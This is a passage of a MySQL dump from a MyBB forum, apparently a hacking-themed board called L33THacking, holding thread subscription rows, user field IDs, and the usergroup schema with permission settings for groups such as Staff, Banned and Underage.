'e993d649699fd1dc2b260e026704e3c4'); INSERT INTO mybb_threadsubscriptions VALUES('117', '82', '271', '1', '1346163123', 'de2707136391bc56c902b837b4605584'); INSERT INTO mybb_threadsubscriptions VALUES('118', '82', '262', '1', '1346163204', 'd02222292df545c628b071598384045a'); INSERT INTO mybb_threadsubscriptions VALUES('119', '82', '272', '1', '1346169725', '8d826319d2271c6a9dd8e9f821c8c1fb'); INSERT INTO mybb_threadsubscriptions VALUES('120', '82', '276', '1', '1346203064', 'b7b12187dc14a3e1af1a0080817ddbb5'); INSERT INTO mybb_threadsubscriptions VALUES('121', '82', '275', '1', '1346210074', '5fb43ef6d2ac9a18952f969f8a5538bf'); INSERT INTO mybb_threadsubscriptions VALUES('122', '82', '273', '1', '1346210928', 'd4b2b7f4299458cf12583f28bbe9290a'); INSERT INTO mybb_threadsubscriptions VALUES('123', '82', '278', '1', '1346252666', '993f94ffcc2b897b54311213c8ad7277'); INSERT INTO mybb_threadsubscriptions VALUES('124', '82', '279', '1', '1346256050', '92b39e0bede6b5b67dd0090c75980e9f'); INSERT INTO mybb_threadsubscriptions VALUES('126', '82', '282', '1', '1346287917', 'e65309187708cead35303ccf86969747'); INSERT INTO mybb_threadsubscriptions VALUES('127', '82', '286', '1', '1346288091', 'de859cb7726cd15d6005fcf60ba589e5'); INSERT INTO mybb_threadsubscriptions VALUES('128', '48', '141', '0', '1346342033', '1b8e07ea56f0ec46316fad7fc3500812'); INSERT INTO mybb_threadsubscriptions VALUES('129', '82', '281', '1', '1346348557', 'cd96e837cc52f253a54ca31af7718615'); INSERT INTO mybb_threadsubscriptions VALUES('130', '82', '284', '1', '1346350445', 'd83732325c419ecca8367ff10a6e9d32'); INSERT INTO mybb_threadsubscriptions VALUES('133', '154', '234', '1', '1347177981', '077376a144ed17f54677b07f44964f51'); INSERT INTO mybb_threadsubscriptions VALUES('134', '159', '298', '0', '1347329497', '70daae69856c14f46b1425873d51a922'); INSERT INTO mybb_threadsubscriptions VALUES('135', '200', '536', '1', '1348794230', '2b13adcc93b297a99eb5129d4a5c3c9c'); INSERT INTO mybb_threadsubscriptions VALUES('136', '200', '526', '1', '1348794406', 'b4a2ce2721460f505337e04be48216dd'); INSERT INTO mybb_threadsubscriptions VALUES('137', '200', '529', '1', '1348794616', '91e970494dbb60fa80dc8e5661ce5419'); INSERT INTO mybb_threadsubscriptions VALUES('138', '200', '439', '1', '1348794685', '80fdd3ab4a01e74175dc067add476b19'); INSERT INTO mybb_threadsubscriptions VALUES('139', '200', '494', '1', '1348794760', '9dcd1395e589ca8c5f3002da6523a6dc'); INSERT INTO mybb_threadsubscriptions VALUES('140', '200', '528', '1', '1348794793', '50b8e51a189fdd9d96f2c4fb4778424c'); INSERT INTO mybb_threadsubscriptions VALUES('141', '200', '514', '1', '1348794835', 'de349bb00089a9aa47c2472f5f7bd8b9'); INSERT INTO mybb_threadsubscriptions VALUES('142', '200', '518', '1', '1348794870', 'ed51e9b1dfcf4347466b2484c1f1fd0a'); INSERT INTO mybb_threadsubscriptions VALUES('143', '200', '493', '1', '1348794997', 'b023d7168db64fef9176652074eed2e8'); INSERT INTO mybb_threadsubscriptions VALUES('144', '200', '449', '1', '1348795062', '959b667c0c5d1956e4d09a88243a350b'); INSERT INTO mybb_threadsubscriptions VALUES('145', '200', '390', '1', '1348795092', '728e732794c98c208c9e16faacafc026'); INSERT INTO mybb_threadsubscriptions VALUES('146', '200', '257', '1', '1348795124', 'bee22fac52d2d5703f03e509eccddef8'); INSERT INTO mybb_threadsubscriptions VALUES('147', '200', '209', '1', '1348797830', '13ed8b79e5e5fe8642f497281633820e'); INSERT INTO mybb_threadsubscriptions VALUES('148', '228', '807', '1', '1349957220', '1e1b7584b114bb5f9a605f4f3fa44eeb'); INSERT INTO mybb_threadsubscriptions VALUES('149', '228', '822', '1', '1350029946', '1f9009202e9820f536d0cc863ac7e8ec'); INSERT INTO mybb_threadsubscriptions VALUES('150', '257', '848', '1', '1350120079', 'f4bf4616efafcef81275a40c6b3fd25c'); INSERT INTO mybb_threadsubscriptions VALUES('151', '257', '845', '1', '1350120159', 'a5ad50354fe068aa50555c89a4dff62c'); INSERT INTO mybb_threadsubscriptions VALUES('152', '257', '865', '1', '1350261994', '8966933f5ab1b24c66becdc4046ffabf'); INSERT INTO mybb_threadsubscriptions VALUES('153', '228', '891', '1', '1350393266', 'db51993915fe4cc59a28265075fbf67a'); INSERT INTO mybb_threadsubscriptions VALUES('154', '228', '892', '1', '1350393859', '52860c7ba14e4547fb38f811d771ca37'); INSERT INTO mybb_threadsubscriptions VALUES('155', '228', '900', '1', '1350424596', '4fffc982d5ee2f098e3bf1239cd8930f'); INSERT INTO mybb_threadsubscriptions VALUES('157', '228', '957', '1', '1350593317', 'cd7c25279e6c7f44f3a565eb68c3d95a'); INSERT INTO mybb_threadsubscriptions VALUES('160', '100', '398', '1', '1352517221', 'cb430f85a6e3abd620618543020ff33a'); DROP TABLE IF EXISTS mybb_threadviews; CREATE TABLE mybb_threadviews ( tid int(10) unsigned NOT NULL, KEY tid (tid) ); DROP TABLE IF EXISTS mybb_userfields; CREATE TABLE mybb_userfields ( ufid int(10) unsigned NOT NULL, PRIMARY KEY (ufid) ); INSERT INTO mybb_userfields VALUES('2'); INSERT INTO mybb_userfields VALUES('3'); INSERT INTO mybb_userfields VALUES('4'); INSERT INTO mybb_userfields VALUES('5'); INSERT INTO mybb_userfields VALUES('6'); INSERT INTO mybb_userfields VALUES('7'); INSERT INTO mybb_userfields VALUES('8'); INSERT INTO mybb_userfields VALUES('9'); INSERT INTO mybb_userfields VALUES('10'); INSERT INTO mybb_userfields VALUES('11'); INSERT INTO mybb_userfields VALUES('12'); INSERT INTO mybb_userfields VALUES('13'); INSERT INTO mybb_userfields VALUES('14'); INSERT INTO mybb_userfields VALUES('16'); INSERT INTO mybb_userfields VALUES('17'); INSERT INTO mybb_userfields VALUES('18'); INSERT INTO mybb_userfields VALUES('19'); INSERT INTO mybb_userfields VALUES('20'); INSERT INTO mybb_userfields VALUES('21'); INSERT INTO mybb_userfields VALUES('23'); INSERT INTO mybb_userfields VALUES('24'); INSERT INTO mybb_userfields VALUES('25'); INSERT INTO mybb_userfields VALUES('26'); INSERT INTO mybb_userfields VALUES('27'); INSERT INTO mybb_userfields VALUES('29'); INSERT INTO mybb_userfields VALUES('31'); INSERT INTO mybb_userfields VALUES('33'); INSERT INTO mybb_userfields VALUES('34'); INSERT INTO mybb_userfields VALUES('36'); INSERT INTO mybb_userfields VALUES('39'); INSERT INTO mybb_userfields VALUES('42'); INSERT INTO mybb_userfields VALUES('43'); INSERT INTO mybb_userfields VALUES('44'); INSERT INTO mybb_userfields VALUES('45'); INSERT INTO mybb_userfields VALUES('48'); INSERT INTO mybb_userfields VALUES('50'); INSERT INTO mybb_userfields VALUES('51'); INSERT INTO mybb_userfields VALUES('52'); INSERT INTO mybb_userfields VALUES('53'); INSERT INTO mybb_userfields VALUES('54'); INSERT INTO mybb_userfields VALUES('55'); INSERT INTO mybb_userfields VALUES('56'); INSERT INTO mybb_userfields VALUES('57'); INSERT INTO mybb_userfields VALUES('60'); INSERT INTO mybb_userfields VALUES('61'); INSERT INTO mybb_userfields VALUES('62'); INSERT INTO mybb_userfields VALUES('63'); INSERT INTO mybb_userfields VALUES('64'); INSERT INTO mybb_userfields VALUES('65'); INSERT INTO mybb_userfields VALUES('66'); INSERT INTO mybb_userfields VALUES('67'); INSERT INTO mybb_userfields VALUES('68'); INSERT INTO mybb_userfields VALUES('69'); INSERT INTO mybb_userfields VALUES('70'); INSERT INTO mybb_userfields VALUES('71'); INSERT INTO mybb_userfields VALUES('72'); INSERT INTO mybb_userfields VALUES('80'); INSERT INTO mybb_userfields VALUES('82'); INSERT INTO mybb_userfields VALUES('84'); INSERT INTO mybb_userfields VALUES('86'); INSERT INTO mybb_userfields VALUES('87'); INSERT INTO mybb_userfields VALUES('89'); INSERT INTO mybb_userfields VALUES('90'); INSERT INTO mybb_userfields VALUES('91'); INSERT INTO mybb_userfields VALUES('97'); INSERT INTO mybb_userfields VALUES('100'); INSERT INTO mybb_userfields VALUES('101'); INSERT INTO mybb_userfields VALUES('107'); INSERT INTO mybb_userfields VALUES('108'); INSERT INTO mybb_userfields VALUES('109'); INSERT INTO mybb_userfields VALUES('110'); INSERT INTO mybb_userfields VALUES('111'); INSERT INTO mybb_userfields VALUES('112'); INSERT INTO mybb_userfields VALUES('113'); INSERT INTO mybb_userfields VALUES('114'); INSERT INTO mybb_userfields VALUES('115'); INSERT INTO mybb_userfields VALUES('116'); INSERT INTO mybb_userfields VALUES('117'); INSERT INTO mybb_userfields VALUES('119'); INSERT INTO mybb_userfields VALUES('120'); INSERT INTO mybb_userfields VALUES('121'); INSERT INTO mybb_userfields VALUES('122'); INSERT INTO mybb_userfields VALUES('123'); INSERT INTO mybb_userfields VALUES('124'); INSERT INTO mybb_userfields VALUES('125'); INSERT INTO mybb_userfields VALUES('126'); INSERT INTO mybb_userfields VALUES('127'); INSERT INTO mybb_userfields VALUES('128'); INSERT INTO mybb_userfields VALUES('129'); INSERT INTO mybb_userfields VALUES('130'); INSERT INTO mybb_userfields VALUES('131'); INSERT INTO mybb_userfields VALUES('132'); INSERT INTO mybb_userfields VALUES('133'); INSERT INTO mybb_userfields VALUES('134'); INSERT INTO mybb_userfields VALUES('135'); INSERT INTO mybb_userfields VALUES('136'); INSERT INTO mybb_userfields VALUES('137'); INSERT INTO mybb_userfields VALUES('138'); INSERT INTO mybb_userfields VALUES('139'); INSERT INTO mybb_userfields VALUES('141'); INSERT INTO mybb_userfields VALUES('142'); INSERT INTO mybb_userfields VALUES('143'); INSERT INTO mybb_userfields VALUES('144'); INSERT INTO mybb_userfields VALUES('145'); INSERT INTO mybb_userfields VALUES('146'); INSERT INTO mybb_userfields VALUES('147'); INSERT INTO mybb_userfields VALUES('148'); INSERT INTO mybb_userfields VALUES('149'); INSERT INTO mybb_userfields VALUES('150'); INSERT INTO mybb_userfields VALUES('151'); INSERT INTO mybb_userfields VALUES('152'); INSERT INTO mybb_userfields VALUES('153'); INSERT INTO mybb_userfields VALUES('154'); INSERT INTO mybb_userfields VALUES('155'); INSERT INTO mybb_userfields VALUES('156'); INSERT INTO mybb_userfields VALUES('157'); INSERT INTO mybb_userfields VALUES('158'); INSERT INTO mybb_userfields VALUES('159'); INSERT INTO mybb_userfields VALUES('160'); INSERT INTO mybb_userfields VALUES('161'); INSERT INTO mybb_userfields VALUES('162'); INSERT INTO mybb_userfields VALUES('163'); INSERT INTO mybb_userfields VALUES('164'); INSERT INTO mybb_userfields VALUES('165'); INSERT INTO mybb_userfields VALUES('166'); INSERT INTO mybb_userfields VALUES('167'); INSERT INTO mybb_userfields VALUES('168'); INSERT INTO mybb_userfields VALUES('169'); INSERT INTO mybb_userfields VALUES('170'); INSERT INTO mybb_userfields VALUES('171'); INSERT INTO mybb_userfields VALUES('172'); INSERT INTO mybb_userfields VALUES('173'); INSERT INTO mybb_userfields VALUES('174'); INSERT INTO mybb_userfields VALUES('175'); INSERT INTO mybb_userfields VALUES('176'); INSERT INTO mybb_userfields VALUES('177'); INSERT INTO mybb_userfields VALUES('178'); INSERT INTO mybb_userfields VALUES('179'); INSERT INTO mybb_userfields VALUES('180'); INSERT INTO mybb_userfields VALUES('181'); INSERT INTO mybb_userfields VALUES('182'); INSERT INTO mybb_userfields VALUES('183'); INSERT INTO mybb_userfields VALUES('184'); INSERT INTO mybb_userfields VALUES('185'); INSERT INTO mybb_userfields VALUES('187'); INSERT INTO mybb_userfields VALUES('188'); INSERT INTO mybb_userfields VALUES('189'); INSERT INTO mybb_userfields VALUES('190'); INSERT INTO mybb_userfields VALUES('191'); INSERT INTO mybb_userfields VALUES('192'); INSERT INTO mybb_userfields VALUES('193'); INSERT INTO mybb_userfields VALUES('194'); INSERT INTO mybb_userfields VALUES('195'); INSERT INTO mybb_userfields VALUES('196'); INSERT INTO mybb_userfields VALUES('197'); INSERT INTO mybb_userfields VALUES('198'); INSERT INTO mybb_userfields VALUES('199'); INSERT INTO mybb_userfields VALUES('200'); INSERT INTO mybb_userfields VALUES('201'); INSERT INTO mybb_userfields VALUES('202'); INSERT INTO mybb_userfields VALUES('203'); INSERT INTO mybb_userfields VALUES('204'); INSERT INTO mybb_userfields VALUES('205'); INSERT INTO mybb_userfields VALUES('206'); INSERT INTO mybb_userfields VALUES('207'); INSERT INTO mybb_userfields VALUES('208'); INSERT INTO mybb_userfields VALUES('209'); INSERT INTO mybb_userfields VALUES('210'); INSERT INTO mybb_userfields VALUES('211'); INSERT INTO mybb_userfields VALUES('212'); INSERT INTO mybb_userfields VALUES('213'); INSERT INTO mybb_userfields VALUES('214'); INSERT INTO mybb_userfields VALUES('215'); INSERT INTO mybb_userfields VALUES('216'); INSERT INTO mybb_userfields VALUES('217'); INSERT INTO mybb_userfields VALUES('218'); INSERT INTO mybb_userfields VALUES('219'); INSERT INTO mybb_userfields VALUES('220'); INSERT INTO mybb_userfields VALUES('221'); INSERT INTO mybb_userfields VALUES('222'); INSERT INTO mybb_userfields VALUES('223'); INSERT INTO mybb_userfields VALUES('224'); INSERT INTO mybb_userfields VALUES('225'); INSERT INTO mybb_userfields VALUES('226'); INSERT INTO mybb_userfields VALUES('227'); INSERT INTO mybb_userfields VALUES('228'); INSERT INTO mybb_userfields VALUES('229'); INSERT INTO mybb_userfields VALUES('230'); INSERT INTO mybb_userfields VALUES('231'); INSERT INTO mybb_userfields VALUES('232'); INSERT INTO mybb_userfields VALUES('233'); INSERT INTO mybb_userfields VALUES('234'); INSERT INTO mybb_userfields VALUES('235'); INSERT INTO mybb_userfields VALUES('236'); INSERT INTO mybb_userfields VALUES('237'); INSERT INTO mybb_userfields VALUES('238'); INSERT INTO mybb_userfields VALUES('239'); INSERT INTO mybb_userfields VALUES('240'); INSERT INTO mybb_userfields VALUES('241'); INSERT INTO mybb_userfields VALUES('242'); INSERT INTO mybb_userfields VALUES('243'); INSERT INTO mybb_userfields VALUES('244'); INSERT INTO mybb_userfields VALUES('245'); INSERT INTO mybb_userfields VALUES('247'); INSERT INTO mybb_userfields VALUES('248'); INSERT INTO mybb_userfields VALUES('249'); INSERT INTO mybb_userfields VALUES('250'); INSERT INTO mybb_userfields VALUES('251'); INSERT INTO mybb_userfields VALUES('252'); INSERT INTO mybb_userfields VALUES('253'); INSERT INTO mybb_userfields VALUES('254'); INSERT INTO mybb_userfields VALUES('255'); INSERT INTO mybb_userfields VALUES('256'); INSERT INTO mybb_userfields VALUES('257'); INSERT INTO mybb_userfields VALUES('258'); INSERT INTO mybb_userfields VALUES('259'); INSERT INTO mybb_userfields VALUES('260'); INSERT INTO mybb_userfields VALUES('261'); INSERT INTO mybb_userfields VALUES('262'); INSERT INTO mybb_userfields VALUES('263'); INSERT INTO mybb_userfields VALUES('264'); INSERT INTO mybb_userfields VALUES('265'); INSERT INTO mybb_userfields VALUES('266'); INSERT INTO mybb_userfields VALUES('267'); INSERT INTO mybb_userfields VALUES('268'); INSERT INTO mybb_userfields VALUES('269'); INSERT INTO mybb_userfields VALUES('270'); INSERT INTO mybb_userfields VALUES('271'); INSERT INTO mybb_userfields VALUES('272'); INSERT INTO mybb_userfields VALUES('273'); INSERT INTO mybb_userfields VALUES('274'); INSERT INTO mybb_userfields VALUES('275'); INSERT INTO mybb_userfields VALUES('276'); INSERT INTO mybb_userfields VALUES('277'); INSERT INTO mybb_userfields VALUES('278'); INSERT INTO mybb_userfields VALUES('279'); INSERT INTO mybb_userfields VALUES('280'); INSERT INTO mybb_userfields VALUES('281'); INSERT INTO mybb_userfields VALUES('282'); INSERT INTO mybb_userfields VALUES('283'); INSERT INTO mybb_userfields VALUES('284'); INSERT INTO mybb_userfields VALUES('285'); INSERT INTO mybb_userfields VALUES('286'); INSERT INTO mybb_userfields VALUES('287'); INSERT INTO mybb_userfields VALUES('288'); INSERT INTO mybb_userfields VALUES('289'); INSERT INTO mybb_userfields VALUES('290'); INSERT INTO mybb_userfields VALUES('291'); INSERT INTO mybb_userfields VALUES('292'); INSERT INTO mybb_userfields VALUES('293'); INSERT INTO mybb_userfields VALUES('294'); INSERT INTO mybb_userfields VALUES('295'); INSERT INTO mybb_userfields VALUES('296'); INSERT INTO mybb_userfields VALUES('297'); INSERT INTO mybb_userfields VALUES('298'); INSERT INTO mybb_userfields VALUES('299'); INSERT INTO mybb_userfields VALUES('300'); INSERT INTO mybb_userfields VALUES('301'); INSERT INTO mybb_userfields VALUES('302'); INSERT INTO mybb_userfields VALUES('303'); INSERT INTO mybb_userfields VALUES('304'); INSERT INTO mybb_userfields VALUES('305'); INSERT INTO mybb_userfields VALUES('306'); INSERT INTO mybb_userfields VALUES('307'); INSERT INTO mybb_userfields VALUES('308'); INSERT INTO mybb_userfields VALUES('309'); INSERT INTO mybb_userfields VALUES('310'); INSERT INTO mybb_userfields VALUES('311'); INSERT INTO mybb_userfields VALUES('312'); INSERT INTO mybb_userfields VALUES('313'); INSERT INTO mybb_userfields VALUES('314'); INSERT INTO mybb_userfields VALUES('315'); INSERT INTO mybb_userfields VALUES('316'); INSERT INTO mybb_userfields VALUES('318'); INSERT INTO mybb_userfields VALUES('319'); INSERT INTO mybb_userfields VALUES('320'); INSERT INTO mybb_userfields VALUES('321'); INSERT INTO mybb_userfields VALUES('322'); INSERT INTO mybb_userfields VALUES('323'); INSERT INTO mybb_userfields VALUES('324'); INSERT INTO mybb_userfields VALUES('325'); INSERT INTO mybb_userfields VALUES('326'); INSERT INTO mybb_userfields VALUES('327'); INSERT INTO mybb_userfields VALUES('328'); INSERT INTO mybb_userfields VALUES('329'); INSERT INTO mybb_userfields VALUES('330'); INSERT INTO mybb_userfields VALUES('331'); INSERT INTO mybb_userfields VALUES('332'); INSERT INTO mybb_userfields VALUES('333'); INSERT INTO mybb_userfields VALUES('334'); INSERT INTO mybb_userfields VALUES('335'); INSERT INTO mybb_userfields VALUES('336'); INSERT INTO mybb_userfields VALUES('337'); INSERT INTO mybb_userfields VALUES('338'); INSERT INTO mybb_userfields VALUES('339'); INSERT INTO mybb_userfields VALUES('340'); INSERT INTO mybb_userfields VALUES('341'); INSERT INTO mybb_userfields VALUES('342'); INSERT INTO mybb_userfields VALUES('343'); INSERT INTO mybb_userfields VALUES('344'); INSERT INTO mybb_userfields VALUES('345'); DROP TABLE IF EXISTS mybb_usergroups; CREATE TABLE mybb_usergroups ( gid smallint(5) unsigned NOT NULL auto_increment, type smallint(2) DEFAULT '2' NOT NULL, title varchar(120) NOT NULL, description text NOT NULL, namestyle varchar(200) DEFAULT '{username}' NOT NULL, usertitle varchar(120) NOT NULL, stars smallint(4) NOT NULL, starimage varchar(120) NOT NULL, image varchar(120) NOT NULL, disporder smallint(6) unsigned NOT NULL, isbannedgroup int(1) NOT NULL, canview int(1) NOT NULL, canviewthreads int(1) NOT NULL, canviewprofiles int(1) NOT NULL, candlattachments int(1) NOT NULL, canpostthreads int(1) NOT NULL, canpostreplys int(1) NOT NULL, canpostattachments int(1) NOT NULL, canratethreads int(1) NOT NULL, caneditposts int(1) NOT NULL, candeleteposts int(1) NOT NULL, candeletethreads int(1) NOT NULL, caneditattachments int(1) NOT NULL, canpostpolls int(1) NOT NULL, canvotepolls int(1) NOT NULL, canundovotes int(1) NOT NULL, canusepms int(1) NOT NULL, cansendpms int(1) NOT NULL, cantrackpms int(1) NOT NULL, candenypmreceipts int(1) NOT NULL, pmquota int(3) NOT NULL, maxpmrecipients int(4) DEFAULT '5' NOT NULL, cansendemail int(1) NOT NULL, cansendemailoverride int(1) NOT NULL, maxemails int(3) DEFAULT '5' NOT NULL, canviewmemberlist int(1) NOT NULL, canviewcalendar int(1) NOT NULL, canaddevents int(1) NOT NULL, canbypasseventmod int(1) NOT NULL, canmoderateevents int(1) NOT NULL, canviewonline int(1) NOT NULL, canviewwolinvis int(1) NOT NULL, canviewonlineips int(1) NOT NULL, cancp int(1) NOT NULL, issupermod int(1) NOT NULL, cansearch int(1) NOT NULL, canusercp int(1) NOT NULL, canuploadavatars int(1) NOT NULL, canratemembers int(1) NOT NULL, canchangename int(1) NOT NULL, showforumteam int(1) NOT NULL, usereputationsystem int(1) NOT NULL, cangivereputations int(1) NOT NULL, reputationpower bigint(30) NOT NULL, maxreputationsday bigint(30) NOT NULL, maxreputationsperuser bigint(30) NOT NULL, maxreputationsperthread bigint(30) NOT NULL, candisplaygroup int(1) NOT NULL, attachquota bigint(30) NOT NULL, cancustomtitle int(1) NOT NULL, canwarnusers int(1) NOT NULL, canreceivewarnings int(1) NOT NULL, maxwarningsday int(3) DEFAULT '3' NOT NULL, canmodcp int(1) NOT NULL, showinbirthdaylist int(1) NOT NULL, canoverridepm int(1) NOT NULL, canusesig int(1) NOT NULL, canusesigxposts bigint(30) NOT NULL, signofollow int(1) NOT NULL, timebtwnthreads int(10) NOT NULL, timebtwnposts int(10) NOT NULL, canremoveeditedby int(1) NOT NULL, edittimelimit int(3) NOT NULL, PRIMARY KEY (gid) ); INSERT INTO mybb_usergroups VALUES('1', '1', 'Guests', 'The default group that all visitors are assigned to unless they\'re logged in.', '{username}', 'Unregistered', '0', '', '', '0', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '5', '0', '0', '5', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('2', '1', 'Registered', 'After registration, all users are placed in this group by default.', '<span style=\"color: grey;\">{username}</span>', '', '0', 'images/stars/yellow.png', '', '3', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '20', '30', '0', '2880'); INSERT INTO mybb_usergroups VALUES('9', '2', 'Elite ', 'Elite; Upgraded members group', '<span style=\"color: orange;\"><strong>{username}</strong></span>', 'Elite Member!', '7', 'images/stars/orange.png', './images/ub/elite1.png', '4', '0', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '0', '1', '1', '1', '0', '1000', '3', '1', '0', '4', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '1', '0', '1', '1', '3', '4', '0', '0', '1', '500', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '20', '30', '0', '0'); INSERT INTO mybb_usergroups VALUES('3', '1', 'Staff', 'These users can moderate any forum.', '<span style=\"color: green;\"><strong>{username}</strong></span>', 'Super Moderator', '8', 'images/stars/purple.gif', './images/ub/staffit.png', '6', '0', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '1', '1', '1', '1', '1', '1', '3000', '5', '0', '0', '10', '1', '0', '0', '0', '0', '1', '1', '1', '0', '1', '1', '1', '1', '1', '1', '1', '1', '1', '6', '8', '0', '0', '1', '0', '1', '1', '1', '3', '1', '0', '1', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('4', '1', 'Administrators', 'The group all administrators belong to.', '<span style=\"color: red;\"><strong><em>{username}</em></strong></span>', 'Administrator', '8', 'images/stars/red.gif', './images/ub/admin5.png', '7', '0', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '1', '1', '1', '1', '1', '5000', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '10', '0', '0', '0', '1', '0', '1', '1', '1', '0', '1', '0', '1', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('5', '1', 'Awaiting Activation', 'Users that have not activated their account by email or manually been activated yet.', '<span style=\"color: silver;\">{username}</span>', 'Account not Activated', '0', 'images/star.gif', '', '0', '0', '1', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '20', '5', '0', '0', '5', '1', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('6', '1', 'Moderators', 'These users moderate specific forums.', '<span style=\"color: blue;\"><strong>{username}</strong></span>', 'Moderator', '7', 'images/stars/blue.png', './images/ub/mod1.png', '5', '0', '1', '1', '1', '1', '1', '1', '1', '0', '1', '1', '0', '1', '1', '1', '0', '1', '1', '1', '1', '1500', '5', '0', '0', '5', '1', '0', '0', '0', '0', '1', '1', '0', '0', '0', '1', '1', '1', '1', '1', '0', '1', '1', '4', '4', '0', '0', '1', '5000', '1', '0', '1', '0', '0', '0', '0', '1', '0', '0', '20', '10', '0', '0'); INSERT INTO mybb_usergroups VALUES('7', '1', 'Banned', 'The default user group to which members that are banned are moved to.', '<span style=\"color: black;\">{username}</span>', 'Banned', '0', 'images/star.gif', '', '9', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('8', '2', 'Bot', 'Spiders and Crawlers', '<span style=\"color: white;\">{username}</span>', '', '0', 'images/star.gif', '', '10', '0', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '1', '0', '0', '4', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '0', '0', '5000', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('10', '2', 'HellBanned', 'Hellbanned members', '<span style=\"color: grey;\">{username}</span>', '', '0', 'images/star.gif ', '', '8', '0', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '100', '5', '0', '0', '4', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '1', '5', '0', '5', '0', '5000', '0', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('12', '4', 'Coders', 'This group is based on coding. Members in this group dedicate their time to code pages/programs and help others to learn how to code. ', '<span style=\"color: grey\">{username}</span>', '', '7', 'images/stars/grey.png ', 'images/ub/Coders.png', '14', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '2880'); INSERT INTO mybb_usergroups VALUES('13', '4', 'Unique', 'We are Unique. We are a HQ Group. And we have the best HQ members. ', '<span style=\"color: grey;\">{username}</span>', '', '7', 'images/stars/grey.png', '/images/ub/unique.gif', '15', '0', '1', '1', '1', '1', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '1', '1', '2', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('14', '2', 'Closed', 'Permanently banned members', '<span style=\"color: black;\"><s>{username}</s></span>', '', '0', 'images/star.gif', '', '11', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '5', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('15', '2', 'Underage', 'People under 14 with parent/legal guardian permission to access LH', '{username}', '', '0', 'images/star.gif', '', '13', '0', '1', '1', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '0', '1', '0', '1', '1', '0', '0', '100', '1', '1', '0', '5', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '0', '5', '0', '0', '1', '0', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_usergroups VALUES('17', '4', 'Gamers', 'L33THackings Gamers group, We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!', '<span style=\"color: grey;\">{username}</span>', '', '7', 'images/stars/grey.png', 'images/ub/gamer.png', '16', '0', '1', '1', '1', '0', '1', '1', '1', '0', '1', '0', '0', '0', '1', '0', '0', '1', '1', '0', '0', '100', '1', '1', '0', '4', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '1', '1', '1', '1', '0', '0', '1', '0', '1', '5', '0', '5', '1', '5000', '0', '0', '1', '0', '0', '0', '0', '1', '0', '0', '0', '0', '0', '0'); INSERT 